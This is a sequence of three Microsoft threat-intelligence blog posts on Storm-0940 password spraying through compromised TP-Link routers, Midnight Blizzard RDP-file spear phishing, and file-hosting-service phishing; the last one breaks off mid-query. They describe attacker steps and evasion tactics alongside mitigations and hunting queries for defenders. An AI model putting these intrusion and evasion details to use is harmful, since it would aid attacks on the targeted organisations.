Microsoft assesses that credentials acquired from CovertNetwork-1658 password spray operations are used by multiple Chinese threat actors. In particular, Microsoft has observed the Chinese threat actor Storm-0940 using credentials from CovertNetwork-1658. Active since at least 2021, Storm-0940 obtains initial access through password spray and brute-force attacks, or by exploiting or misusing network edge applications and services. Storm-0940 is known to target organizations in North America and Europe, including think tanks, government organizations, non-governmental organizations, law firms, defense industrial base, and others.

As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to help secure their environments. In this blog, we provide more information about CovertNetwork-1658 infrastructure, and associated Storm-0940 activity. We also share mitigation recommendations, detection information, and hunting queries that can help organizations identify, investigate, and mitigate associated activity.

What is CovertNetwork-1658?

Microsoft tracks a network of compromised small office and home office (SOHO) routers as CovertNetwork-1658. SOHO routers manufactured by TP-Link make up most of this network. Microsoft uses “CovertNetwork” to refer to a collection of egress IPs consisting of compromised or leased devices that may be used by one or more threat actors.

CovertNetwork-1658 specifically refers to a collection of egress IPs that may be used by one or more Chinese threat actors and is wholly comprised of compromised devices. Microsoft assesses that a threat actor located in China established and maintains this network. The threat actor exploits a vulnerability in the routers to gain remote code execution capability. We continue to investigate the specific exploit by which this threat actor compromises these routers. Microsoft assesses that multiple Chinese threat actors use the credentials acquired from CovertNetwork-1658 password spray operations to perform computer network exploitation (CNE) activities.

Post-compromise activity on compromised routers

After successfully gaining access to a vulnerable router, in some instances, the following steps are taken by the threat actor to prepare the router for password spray operations:

1. Download Telnet binary from a remote File Transfer Protocol (FTP) server
2. Download xlogin backdoor binary from a remote FTP server
3. Utilize the downloaded Telnet and xlogin binaries to start an access-controlled command shell on TCP port 7777
4. Connect and authenticate to the xlogin backdoor listening on TCP port 7777
5. Download a SOCKS5 server binary to router
6. Start SOCKS5 server on TCP port 11288

CovertNetwork-1658 is observed conducting their password spray campaigns through this proxy network to ensure the password spray attempts originate from the compromised devices.

Password spray activity from CovertNetwork-1658 infrastructure

Microsoft has observed multiple password spray campaigns originating from CovertNetwork-1658 infrastructure. In these campaigns, CovertNetwork-1658 submits a very small number of sign-in attempts to many accounts at a target organization. In about 80 percent of cases, CovertNetwork-1658 makes only one sign-in attempt per account per day. Figure 2 depicts this distribution in greater detail.

CovertNetwork-1658 infrastructure is difficult to monitor due to the following characteristics:

• The use of compromised SOHO IP addresses
• The use of a rotating set of IP addresses at any given time. The threat actors had thousands of available IP addresses at their disposal. The average uptime for a CovertNetwork-1658 node is approximately 90 days.
• The low-volume password spray process; for example, monitoring for multiple failed sign-in attempts from one IP address or to one account will not detect this activity

Various security vendors have reported on CovertNetwork-1658 activities, including Sekoia (July 2024) and Team Cymru (August 2024). Microsoft assesses that after these blogs were published, the usage of CovertNetwork-1658 network has declined substantially. The below chart highlights a steady and steep decline in the use of CovertNetwork-1658’s original infrastructure since their activities have been exposed in public reporting as observed in Censys.IO data.

Microsoft assesses that CovertNetwork-1658 has not stopped operations as indicated in recent activity but is likely acquiring new infrastructure with modified fingerprints from what has been publicly disclosed. An observed increase in recent activity may be early evidence supporting this assessment.

Historically, Microsoft has observed an average of 8,000 compromised devices actively engaged in the CovertNetwork-1658 network at any given time. On average, about 20 percent of these devices perform password spraying at any given time. Any threat actor using the CovertNetwork-1658 infrastructure could conduct password spraying campaigns at a larger scale and greatly increase the likelihood of successful credential compromise and initial access to multiple organizations in a short amount of time. This scale, combined with quick operational turnover of compromised credentials between CovertNetwork-1658 and Chinese threat actors, allows for the potential of account compromises across multiple sectors and geographic regions.

Below are User Agent Strings* observed in the password spray activity:

• Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36

*Note: We updated this list of User Agent Strings on November 4, 2024 to fix typos.

Observed activity tied to Storm-0940

Microsoft has observed numerous cases where Storm-0940 has gained initial access to target organizations using valid credentials obtained through CovertNetwork-1658’s password spray operations. In some instances, Storm-0940 was observed using compromised credentials that were obtained from CovertNetwork-1658 infrastructure on the same day. This quick operational hand-off of compromised credentials is evidence of a likely close working relationship between the operators of CovertNetwork-1658 and Storm-0940.

After successfully gaining access to a victim environment, in some instances, Storm-0940 has been observed:        

• Using scanning and credential dumping tools to move laterally within the network;
• Attempting to access network devices and install proxy tools and remote access trojans (RATs) for persistence; and
• Attempting to exfiltrate data.

Recommendations

Organizations can defend against password spraying by building credential hygiene and hardening cloud identities. Microsoft recommends the following mitigations to reduce the impact of this threat:

• Educate users on the importance of credential hygiene and avoiding password reuse.
• Enforce multi-factor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices, in all locations, at all times. Microsoft continues to expand MFA defaults for products and services like Azure to broaden MFA adoption.
  • Consider transitioning to a passwordless primary authentication method, such as Azure MFA, certificates, or Windows Hello for Business.
  • Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.
• Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA.
• Disable legacy authentication.
• Use a cloud-based identity security solution to identify and detect threats or compromised identities.
• Disable stale or unused accounts.
• Reset account passwords for any accounts targeted during a password spray attack. If a targeted account had system-level permissions, further investigation may be warranted.
• Implement the Azure Security Benchmark and general best practices for securing identity infrastructure, including:
  • Create conditional access policies to allow or disallow access to the environment based on defined criteria.
• • Block legacy authentication with Azure AD by using Conditional Access. Legacy authentication protocols don’t have the ability to enforce MFA, so blocking such authentication methods will prevent password spray attackers from taking advantage of the lack of MFA on those protocols.
  • Enable AD FS web application proxy extranet lockout to protect users from potential password brute force compromise.
• Secure accounts with credential hygiene:
  • Practice the principle of least privilege and audit privileged account activity in your Azure AD environments to slow and stop attackers.
  • Deploy Azure AD Connect Health for ADFS. This captures failed attempts as well as IP addresses recorded in ADFS logs for bad requests via the Risky IP report.
  • Use Azure AD password protection to detect and block known weak passwords and their variants.
  • Turn on identity protection in Azure AD to monitor for identity-based risks and create policies for risky sign ins.
• Educate users about phishing attempts and MFA fatigue attacks. Encourage users to report unsolicited MFA authentication prompts.
• Review your Anomaly detection policies in Defender for Cloud Apps under Microsoft 365 Defender Policies by going to Cloud Apps > Policies > Policy management. Then select Anomaly detection policy.

Detection details

Alerts with the following titles in the Security Center can indicate threat activity on your network:

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert can indicate associated threat activity:

• Storm-0940 actor activity detected

Microsoft Defender XDR

The following alert might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.

• Password spray attacks originating from single ISP

Microsoft Defender for Identity

The following Microsoft Defender for Identity alerts can indicate associated threat activity:

• Password Spray
• Unfamiliar Sign-in properties
• Atypical travel
• Suspicious behavior: Impossible travel activity

Microsoft Defender for Cloud Apps

The following Microsoft Defender for Cloud Apps alerts can indicate associated threat activity:

• Suspicious Administrative Activity
• Impossible travel activity

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Potential Storm-0940 activity           

This query identifies UserAgents obtained from observed activity and AAD SignInEvent attributes that identify potential activity to guide investigation:

//Advanced Hunting Query
let suspAppRes = datatable(appId:string, resourceId:string)
[
    "1950a258-227b-4e31-a9cf-717495945fc2", "00000003-0000-0000-c000-000000000000"
];
let userAgents = datatable(userAgent:string)
[
    "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" //Low fidelity
];
AADSignInEventsBeta
| where Timestamp >=ago(30d)
| where ApplicationId in ((suspAppRes | project appId)) and ResourceId in ((suspAppRes | project resourceId)) and UserAgent in ((userAgents| project userAgent))
Failed sign-in activity
The following query identifies failed attempts to sign-in from multiple sources that originate from a single ISP. Attackers distribute attacks from multiple IP addresses across a single service provider to evade detection
IdentityLogonEvents
| where Timestamp > ago(4h)
| where ActionType == "LogonFailed"
| where isnotempty(AccountObjectId)
| summarize TargetCount = dcount(AccountObjectId), TargetCountry = dcount(Location), TargetIPAddress = dcount(IPAddress) by ISP
| where TargetCount >= 100
| where TargetCountry >= 5
| where TargetIPAddress >= 25

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy.

Potential Storm-0940 activity

This query identifies UserAgents obtained from observed activity and AAD SignInEvent attributes that identify potential activity to guide investigation:

//sentinelquery
let suspAppRes = datatable(appId:string, resourceId:string)
[
    "1950a258-227b-4e31-a9cf-717495945fc2", "00000003-0000-0000-c000-000000000000"
];
let userAgents = datatable(userAgent:string)
[
    "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" //Low fidelity
];
SigninLogs
| where TimeGenerated >=ago(30d)
| where AppId  in ((suspAppRes | project appId)) and ResourceIdentity in ((suspAppRes | project resourceId)) and UserAgent in ((userAgents| project userAgent))

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network appeared first on Microsoft Security Blog.

The spear-phishing emails in this campaign were sent to thousands of targets in over 100 organizations and contained a signed Remote Desktop Protocol (RDP) configuration file that connected to an actor-controlled server. In some of the lures, the actor attempted to add credibility to their malicious messages by impersonating Microsoft employees. The threat actor also referenced other cloud providers in the phishing lures.

While this campaign focuses on many of Midnight Blizzard’s usual targets, the use of a signed RDP configuration file to gain access to the targets’ devices represents a novel access vector for this actor. Overlapping activity has also been reported by the Government Computer Emergency Response Team of Ukraine (CERT-UA) under the designation UAC-0215 and also by Amazon.

Midnight Blizzard is a Russian threat actor attributed by the United States and United Kingdom governments to the Foreign Intelligence Service of the Russian Federation, also known as the SVR. This threat actor is known to primarily target governments, diplomatic entities, non-governmental organizations (NGOs), and IT service providers, primarily in the United States and Europe. Its focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018. Its operations often involve compromise of valid accounts and, in some highly targeted cases, advanced techniques to compromise authentication mechanisms within an organization to expand access and evade detection.

Midnight Blizzard is consistent and persistent in its operational targeting, and its objectives rarely change. It uses diverse initial access methods, including spear phishing, stolen credentials, supply chain attacks, compromise of on-premises environments to laterally move to the cloud, and leveraging service providers’ trust chain to gain access to downstream customers. Midnight Blizzard is known to use the Active Directory Federation Service (AD FS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard is identified by peer security vendors as APT29, UNC2452, and Cozy Bear.

As with any observed nation-state actor activity, Microsoft is in the process of directly notifying customers that have been targeted or compromised, providing them with the necessary information to secure their accounts. Strong anti-phishing measures will help to mitigate this threat. As part of our commitment to helping protect against cyber threats, we provide indicators of compromise (IOCs), hunting queries, detection details, and recommendations at the end of this post.

Spear-phishing campaign

On October 22, 2024, Microsoft identified a spear-phishing campaign in which Midnight Blizzard sent phishing emails to thousands of users in over 100 organizations. The emails were highly targeted, using social engineering lures relating to Microsoft, Amazon Web Services (AWS), and the concept of Zero Trust. The emails contained a Remote Desktop Protocol (RDP) configuration file signed with a LetsEncrypt certificate. RDP configuration (.RDP) files summarize automatic settings and resource mappings that are established when a successful connection to an RDP server occurs. These configurations extend features and resources of the local system to a remote server, controlled by the actor.

In this campaign, the malicious .RDP attachment contained several sensitive settings that would lead to significant information exposure. Once the target system was compromised, it connected to the actor-controlled server and bidirectionally mapped the targeted user’s local device’s resources to the server. Resources sent to the server may include, but are not limited to, all logical hard disks, clipboard contents, printers, connected peripheral devices, audio, and authentication features and facilities of the Windows operating system, including smart cards. This access could enable the threat actor to install malware on the target’s local drive(s) and mapped network share(s), particularly in AutoStart folders, or install additional tools such as remote access trojans (RATs) to maintain access when the RDP session is closed. The process of establishing an RDP connection to the actor-controlled system may also expose the credentials of the user signed in to the target system.

RDP connection

When the target user opened the .RDP attachment, an RDP connection was established to an actor-controlled system. The configuration of the RDP connection then allowed the actor-controlled system to discover and use information about the target system, including:

• Files and directories
• Connected network drives
• Connected peripherals, including smart cards, printers, and microphones
• Web authentication using Windows Hello, passkeys, or security keys
• Clipboard data
• Point of Service (also known as Point of Sale or POS) devices

Targets

Microsoft has observed this campaign targeting governmental agencies, higher education, defense, and non-governmental organizations in dozens of countries, but particularly in the United Kingdom, Europe, Australia, and Japan. This target set is consistent with other Midnight Blizzard phishing campaigns.

Email infrastructure

Midnight Blizzard sent the phishing emails in this campaign using email addresses belonging to legitimate organizations that were gathered during previous compromises. The domains used are listed in the IOC section below.

Mitigations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

• Utilize Windows Firewall or Windows Firewall with Advanced Security to help prevent or restrict outbound RDP connection attempts to external or public networks external or public networks
• Require multifactor authentication (MFA). Implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
• Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with number matching. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
• Implement Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and help blocks malicious websites, including phishing sites, scam sites, and sites that host malware.

Strengthen endpoint security configuration

If you are using Microsoft Defender for Endpoint take the following steps:

• Ensure tamper protection is turned on in Microsoft Defender for Endpoint.
• Turn on network protection in Microsoft Defender for Endpoint.
• Turn on web protection.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
• Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume. 
• Microsoft Defender XDR customers can turn on the following attack surface reduction rules to help prevent common attack techniques used by threat actors.
  • Block executable content from email client and webmail
  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion

Strengthen antivirus configuration

• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections help block a majority of new and unknown variants.
• Enable Microsoft Defender Antivirus scanning of downloaded files and attachments.
• Enable Microsoft Defender Antivirus real-time protection.

Strengthen Microsoft Office 365 configuration

• Turn on Safe Links and Safe Attachments for Office 365.
• Enable Zero-hour auto purge (ZAP) in Office 365 to help quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.

Strengthen email security configuration

• Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. For example, Microsoft Defender for Office 365 merges incident and alert management across email, devices, and identities, centralizing investigations for email-based threats. Organizations can also leverage web browsers that automatically identify and help block malicious websites, including those used in phishing activities.
• If you are using Microsoft Defender for Office 365, configure it to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect an organization from malicious links used in phishing and other attacks.
• If you are using Microsoft Defender for Office 365, use the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing and password attack campaigns. Run spear-phishing (credential harvest) simulations to train end-users against clicking URLs in unsolicited messages and disclosing credentials.

Conduct user education

• Robust user education can help mitigate the threat of social engineering and phishing emails. Companies should have a user education program that highlights how to identify and report suspicious emails.

Microsoft Defender XDR detections

Microsoft Defender for Endpoint

The following alerts may also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

• Midnight Blizzard Actor activity group
• Suspicious RDP session

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects at least some of the malicious .RDP files as the following signature:

• Backdoor:Script/HustleCon.A

Microsoft Defender for Cloud

The following alerts may also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

• Communication with suspicious domain identified by threat intelligence
• Suspicious outgoing RDP network activity
• Traffic detected from IP addresses recommended for blocking

Microsoft Defender for Office 365

Microsoft Defender for Office 365 raises alerts on this campaign using email- and attachment-based detections. Additionally, hunting signatures and an RDP file parser have been incorporated into detections to block similar campaigns in the future. Defenders can identify such activity in alert titles referencing RDP, for example, Trojan_RDP*.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide threat intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

• Midnight Blizzard targets NGOs in new wave of initial access campaigns.
• Midnight Blizzard targets diplomatic, NGOs, and humanitarian organizations in global spear phishing activity.

Hunting queries

Microsoft Defender XDR

Identify potential Midnight Blizzard targeted recipients 

Surface possible targeted email accounts within the environment where the email sender originated from a Midnight Blizzard compromised domain related to the RDP activity.

EmailEvents 
| where SenderFromDomain in~ ("sellar.co.uk", "townoflakelure.com", "totalconstruction.com.au", "swpartners.com.au", "cewalton.com") 
| project SenderFromDomain, SenderFromAddress, RecipientEmailAddress, Subject, Timestamp 

Surface potential targets of an RDP attachment phishing attempt

Surface emails that contain a remote desktop protocol (RDP) file attached. This may indicate that the recipient of the email may have been targeted in an RDP attachment phishing attack attempt.

EmailAttachmentInfo
| where FileName has ".rdp"
| join kind=inner (EmailEvents) on NetworkMessageId
| project SenderFromAddress, RecipientEmailAddress, Subject, Timestamp, FileName, FileType

Identify potential successfully targeted assets in an RDP attachment phishing attack

Surface devices that may have been targeted in an email with an RDP file attached, followed by an RDP connection attempt from the device to an external network. This combined activity may indicate that a device may have been successfully targeted in an RDP attachment phishing attack.

// Step 1: Identify emails with RDP attachments
let rdpEmails = EmailAttachmentInfo
| where FileName has ".rdp"
| join kind=inner (EmailEvents) on NetworkMessageId
| project EmailTimestamp = Timestamp, RecipientEmailAddress, NetworkMessageId, SenderFromAddress;
// Step 2: Identify outbound RDP connections
let outboundRDPConnections = DeviceNetworkEvents
| where RemotePort == 3389
| where ActionType == "ConnectionAttempt"
| where RemoteIPType == "Public"
| project RDPConnectionTimestamp = Timestamp, DeviceId, InitiatingProcessAccountUpn, RemoteIP;
// Step 3: Correlate email and network events
rdpEmails
| join kind=inner (outboundRDPConnections) on $left.RecipientEmailAddress == $right.InitiatingProcessAccountUpn
| project EmailTimestamp, RecipientEmailAddress, SenderFromAddress, RDPConnectionTimestamp, DeviceId, RemoteIP

Threat actor RDP connection files attached to email

Surface users that may have received an RDP connection file attached in email that have been observed in this attack from Midnight Blizzard.

EmailAttachmentInfo
| where FileName in~ (
    "AWS IAM Compliance Check.rdp",
    "AWS IAM Configuration.rdp",
    "AWS IAM Quick Start.rdp",
    "AWS SDE Compliance Check.rdp",
    "AWS SDE Environment Check.rdp",
    "AWS Secure Data Exchange - Compliance Check.rdp",
    "AWS Secure Data Exchange Compliance.rdp",
    "Device Configuration Verification.rdp",
    "Device Security Requirements Check.rdp",
    "IAM Identity Center Access.rdp",
    "IAM Identity Center Application Access.rdp",
    "Zero Trust Architecture Configuration.rdp",
    "Zero Trust Security Environment Compliance Check.rdp",
    "ZTS Device Compatibility Test.rdp"
)
| project Timestamp, FileName, SHA256, RecipientEmailAddress, SenderDisplayName, SenderFromAddress

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Indicators of compromise

Email sender domains

RDP file names

• AWS IAM Compliance Check.rdp
• AWS IAM Configuration.rdp
• AWS IAM Quick Start.rdp
• AWS SDE Compliance Check.rdp
• AWS SDE Environment Check.rdp
• AWS SDE Environment Check.rdp 
• AWS Secure Data Exchange – Compliance Check.rdp
• AWS Secure Data Exchange Compliance.rdp
• Device Configuration Verification.rdp
• Device Security Requirements Check.rdp
• IAM Identity Center Access.rdp
• IAM Identity Center Application Access.rdp
• Zero Trust Architecture Configuration.rdp
• Zero Trust Security Environment Compliance Check.rdp
• ZTS Device Compatibility Test.rdp

RDP remote computer domains

References

• https://cert.gov.ua/article/6281076
• https://aws.Alpha XR/blogs/security/amazon-identified-internet-domains-abused-by-apt29/
• https://media.defense.gov/2024/Oct/09/2003562611/-1/-1/0/CSA-UPDATE-ON-SVR-CYBER-OPS.PDF
• http://approjects.co.za/?big=security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/?msockid=392e4194f0f26165030055c3f1de6080
• http://approjects.co.za/?big=security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/?msockid=392e4194f0f26165030055c3f1de6080

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files appeared first on Microsoft Security Blog.

Legitimate hosting services, such as SharePoint, OneDrive, and Dropbox, are widely used by organizations for storing, sharing, and collaborating on files. However, the widespread use of such services also makes them attractive targets for threat actors, who exploit the trust and familiarity associated with these services to deliver malicious files and links, often avoiding detection by traditional security measures.

Importantly, Microsoft takes action against malicious users violating the Microsoft Services Agreement in how they use apps like SharePoint and OneDrive. To help protect enterprise accounts from compromise, by default both Microsoft 365 and Office 365 support multi-factor authentication (MFA) and passwordless sign-in. Consumers can also go passwordless with their Microsoft account. Because security is a team sport, Microsoft also works with third parties like Dropbox to share threat intelligence and protect mutual customers and the wider community.

In this blog, we discuss the typical attack chain used in campaigns misusing file hosting services and detail the recently observed tactics, techniques, and procedures (TTPs), including the increasing use of certain defense evasion tactics. To help defenders protect their identities and data, we also share mitigation guidance to help reduce the impact of this threat, and detection details and hunting queries to locate potential misuse of file hosting services and related threat actor activities. By understanding these evolving threats and implementing the recommended mitigations, organizations can better protect themselves against these sophisticated campaigns and safeguard digital assets.

Attack overview

Phishing campaigns exploiting legitimate file hosting services have been trending throughout the last few years, especially due to the relative ease of the technique. The files are delivered through different approaches, including email and email attachments like PDFs, OneNote, and Word files, with the intent of compromising identities or devices. These campaigns are different from traditional phishing attacks because of the sophisticated defense evasion techniques used.

Since mid-April 2024, we observed threat actors increasingly use these tactics aimed at circumventing defense mechanisms:

• Files with restricted access: The files sent through the phishing emails are configured to be accessible solely to the designated recipient. This requires the recipient to be signed in to the file-sharing service—be it Dropbox, OneDrive, or SharePoint—or to re-authenticate by entering their email address along with a one-time password (OTP) received through a notification service.
• Files with view-only restrictions: To bypass analysis by email detonation systems, the files shared in these phishing attacks are set to ‘view-only’ mode, disabling the ability to download and consequently, the detection of embedded URLs within the file.

An example attack chain is provided below, depicting the updated defense evasion techniques being used across stages 4, 5, and 6:

Initial access

The attack typically begins with the compromise of a user within a trusted vendor. After compromising the trusted vendor, the threat actor hosts a file on the vendor’s file hosting service, which is then shared with a target organization. This misuse of legitimate file hosting services is particularly effective because recipients are more likely to trust emails from known vendors, allowing threat actors to bypass security measures and compromise identities. Often, users from trusted vendors are added to allow lists through policies set by the organization on Exchange Online products, enabling phishing emails to be successfully delivered.

While file names observed in these campaigns also included the recipients, the hosted files typically follow these patterns:

• Familiar topics based on existing conversations
  • For example, if the two organizations have prior interactions related to an audit, the shared files could be named “Audit Report 2024”.
• Familiar topics based on current context
  • If the attack has not originated from a trusted vendor, the threat actor often impersonates administrators or help desk or IT support personnel in the sender display name and uses a file name such as “IT Filing Support 2024”, “Forms related to Tax submission”, or “Troubleshooting guidelines”.
• Topics based on urgency
  • Another common technique observed by the threat actors creating these files is that they create a sense of urgency with the file names like “Urgent:Attention Required” and “Compromised Password Reset”.

Defense evasion techniques

Once the threat actor shares the files on the file hosting service with the intended users, the file hosting service sends the target user an automated email notification with a link to access the file securely. This email is not a phishing email but a notification for the user about the sharing action. In scenarios involving SharePoint or OneDrive, the file is shared from the user’s context, with the compromised user’s email address as the sender. However, in the Dropbox scenario, the file is shared from no-reply@dropbox[.]com. The files are shared through automated notification emails with the subject: “<User> shared <document> with you”. To evade detections, the threat actor deploys the following additional techniques:

• Only the intended recipient can access the file
  • The intended recipient needs to re-authenticate before accessing the file
  • The file is accessible only for a limited time window
• The PDF shared in the file cannot be downloaded

These techniques make detonation and analysis of the sample with the malicious link almost impossible since they are restricted.

Identity compromise

When the targeted user accesses the shared file, the user is prompted to verify their identity by providing their email address:

Next, an OTP is sent from no-reply@notify.microsoft[.]com. Once the OTP is submitted, the user is successfully authorized and can view a document, often masquerading as a preview, with a malicious link, which is another lure to make the targeted user click the “View my message” access link.

This link redirects the user to an adversary-in-the-middle (AiTM) phishing page, where the user is prompted to provide the password and complete multifactor authentication (MFA). The compromised token can then be leveraged by the threat actor to perform the second stage BEC attack and continue the campaign.

Recommended actions

Microsoft recommends the following mitigations to reduce the impact of this threat:

• Enable Conditional Access policies in Microsoft Entra, especially risk-based access policies. Conditional access policies evaluate sign-in requests using additional identity-driven signals like user or group membership, IP address location information, and device status, among others, are enforced for suspicious sign-ins. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as compliant devices, Azure trusted IP address requirements, or risk-based policies with proper access control. If you are still evaluating Conditional Access, use security defaults as an initial baseline set of policies to improve identity security posture.
• Implement continuous access evaluation.
• Implement Microsoft Entra passwordless sign-in with FIDO2 security keys.
• Turn on network protection in Microsoft Defender for Endpoint to block connections to malicious domains and IP addresses.
• Implement Microsoft Defender for Endpoint – Mobile Threat Defense on mobile devices used to access enterprise assets.
• Leverage Microsoft Edge to automatically identify and block malicious websites, including those used in this phishing campaign, and Microsoft Defender for Office 365 to detect and block malicious emails, links, and files. Monitor suspicious or anomalous activities in Microsoft Entra ID Protection. Investigate sign-in attempts with suspicious characteristics (such as the location, ISP, user agent, and use of anonymizer services). Educate users about the risks of secure file sharing and emails from trusted vendors.

Appendix

Microsoft Defender XDR detections

Microsoft Defender XDR raises the following alerts by combining Microsoft Defender for Office 365 URL click and Microsoft Entra ID Protection risky sign-ins signal.

• Risky sign-in after clicking a possible AiTM phishing URL
• User compromised through session cookie hijack
• User compromised in a known AiTM phishing kit

Hunting queries

Microsoft Defender XDR 

The file sharing events related to the activity in this blog post can be audited through the CloudAppEvents telemetry. Microsoft Defender XDR customers can run the following query to find related activity in their networks: 

Automated email notifications and suspicious sign-in activity

By correlating the email from the Microsoft notification service or Dropbox automated notification service with a suspicious sign-in activity, we can identify compromises, especially from securely shared SharePoint or Dropbox files.

let usersWithSuspiciousEmails = EmailEvents
    | where SenderFromAddress in ("no-reply@notify.microsoft.com", "no-reply@dropbox.com") or InternetMessageId startswith "<OneTimePasscode"
    | where isnotempty(RecipientObjectId)
    | distinct RecipientObjectId;
AADSignInEventsBeta
| where AccountObjectId in (usersWithSuspiciousEmails)
| where RiskLevelDuringSignIn == 100

Files share contents and suspicious sign-in activity

In the majority of the campaigns, the file name involves a sense of urgency or content related to finance or credential updates. By correlating the file share emails with suspicious sign-ins, compromises can be detected. (For example: Alex shared “Password Reset Mandatory.pdf” with you). Since these are observed as campaigns, validating that the same file has been shared with multiple users in the organization can support the detection.

let usersWithSuspiciousEmails = EmailEvents
    | where Subject has_all ("shared", "with you")
    | where Subject has_any ("payment", "invoice", "urgent", "mandatory", "Payoff", "Wire", "Confirmation", "password")
    | where isnotempty(RecipientObjectId)
    | summarize RecipientCount = dcount(RecipientObjectId), RecipientList = make_set(RecipientObjectId) by Subject
    | where RecipientCount >= 10
    | mv-expand RecipientList to typeof(string)
    | distinct RecipientList;
AADSignInEventsBeta
| where AccountObjectId in (usersWithSuspiciousEmails)
| where RiskLevelDuringSignIn == 100

BEC: File sharing tactics based on the file hosting service used

To initiate the file sharing activity, these campaigns commonly use certain action types depending on the file hosting service being leveraged. Below are the action types from the audit logs recorded for the file sharing events. These action types can be used to hunt for activities related to these campaigns by replacing the action type for its respective application in the queries below this table.

OneDrive or SharePoint: The following query highlights that a specific file has been shared by a user with multiple participants. Correlating this activity with suspicious sign-in attempts preceding this can help identify lateral movements and BEC attacks.

let securelinkCreated = CloudAppEvents
    | where ActionType == "SecureLinkCreated"
    | project FileCreatedTime = Timestamp, AccountObjectId, ObjectName;
let filesCreated = securelinkCreated
    | where isnotempty(ObjectName)
